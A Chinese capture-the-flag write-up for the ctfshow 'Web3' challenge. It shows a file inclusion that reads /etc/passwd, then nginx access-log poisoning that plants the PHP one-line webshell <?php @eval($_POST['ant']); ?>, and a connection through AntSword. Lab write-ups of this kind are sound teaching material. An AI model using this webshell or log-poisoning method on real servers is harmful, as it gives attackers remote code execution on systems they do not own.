[ctfshow]Web3

Web3

题目描述

更简单的web题

题目解析

打开题目只看到一行命令，这一看就是文件包含，include语句会获取指定文件中存在的所有文本/代码/标记，并复制到使用include语句的文件中。

直接构造?url=/etc/passwd，有回显，证明确实是文件包含。但是想要获取flag还得知道flag的文件在哪。这怎么找呢？

这里非常体现信息收集的重要性！这里发现服务器是nginx，联想到nginx的日志路经/var/log/nginx/access.log，既然能文件包含，那么应该可以输出nginx的日志，尝试一下真的输出了！在日志中记录了每次请求的地址、协议头，那么我们就相当于有了对服务器的写权限！不搞个一句话说不过去了<?php @eval($_POST['ant']); ?>修改请求的协议头，再次读取日志文件，发现日志中记录了一句话。常使用蚁剑进行连接，成功！